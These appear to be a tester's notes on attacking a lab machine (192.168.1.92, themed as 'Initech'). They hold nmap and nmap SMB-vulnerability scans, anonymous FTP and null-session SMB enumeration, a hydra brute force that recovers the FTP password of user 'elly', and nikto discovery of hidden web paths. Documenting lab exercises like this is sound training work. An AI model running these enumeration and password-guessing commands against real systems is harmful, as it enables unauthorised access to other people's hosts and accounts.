192.168.1.92

DATOS
Posibles usuarios ftp
harry
elly
john
kathy
fred

nmap -sS 192.168.1.92
  PORT     STATE  SERVICE
  20/tcp   closed ftp-data
  21/tcp   open   ftp
  22/tcp   open   ssh
  53/tcp   open   domain
  80/tcp   open   http
  139/tcp  open   netbios-ssn
  666/tcp  open   doom
  3306/tcp open   mysql
  
nmap -sV -O -Pn 192.168.1.92 -p20,21,22,53,80,139,666,3306
  PORT     STATE  SERVICE     VERSION
  20/tcp   closed ftp-data
  21/tcp   open   ftp         vsftpd 2.0.8 or later
  22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  53/tcp   open   domain      dnsmasq 2.75
  80/tcp   open   http        PHP cli server 5.5 or later
  139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  666/tcp  open   doom?
  3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1

ftp 192.168.1.92
anonymous:[en blanco]

dir
get note

cat note
  Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
  
smbclient -L //192.168.1.92
  print$          Disk      Printer Drivers
  kathy           Disk      Fred, What are we doing here?
  tmp             Disk      All temporary files should be stored here
  IPC$            IPC       IPC Service (red server (Samba, Ubuntu))

enum4linux -U -M -S -P -G -d -r -l -o -i -n 192.168.1.92
[+] Server 192.168.1.92 allows sessions using username '', password ''
[+] Attempting to map shares on 192.168.1.92
//192.168.1.92/print$   Mapping: DENIED, Listing: N/A
//192.168.1.92/kathy    Mapping: OK, Listing: OK
//192.168.1.92/tmp      Mapping: OK, Listing: OK
//192.168.1.92/IPC$     [E] Can't understand response:
[+] Found domain(s):

        [+] RED
        [+] Builtin
        
S-1-5-21-864226560-67800430-3082388513-501 RED\nobody (Local User)

nmap --script smb-vuln* -p 139 192.168.1.92
VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service

smbclient \\\\192.168.1.92\\kathy -U ""
ls
.                                   D        0  Fri Jun  3 12:52:52 2016
..                                  D        0  Mon Jun  6 17:39:56 2016
kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016
backup                              D        0  Sun Jun  5 11:04:14 2016

cd kathy_stuff
get todo-list.txt
I'm making sure to backup anything important for Initech, Kathy

get wordpress-4.tar.gz


nmap -sU -v 192.168.1.92
  PORT    STATE SERVICE
  53/udp  open  domain
  137/udp open  netbios-ns

smbclient \\\\192.168.1.92\\tmp -U ""
total 12.0K
drwxrwxrwt  2 root root 4.0K Jun  5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..
-rw-r--r--  1 root root    0 Jun  5 16:32 ls
drwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ

hydra -l elly -e nsr ftp://192.168.1.92 -v
  [21][ftp] host: 192.168.1.92   login: elly   password: ylle

wget -m --no-passive ftp://elly:ylle@192.168.1.92

/host
  127.0.1.1       red red.initech
  
/apache2/sites-enabled/
  <VirtualHost _default_:12380>
                ServerAdmin garry@red
                
http://192.168.1.92:12380/
  Server: Apache/2.4.18 (Ubuntu)
  Dave: Soemthing doesn't look right here
  <!-- A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! -->
  
nikto -h http://192.168.1.92:12380/
  /admin112233/
  /blogblog/
  /phpmyadmin/

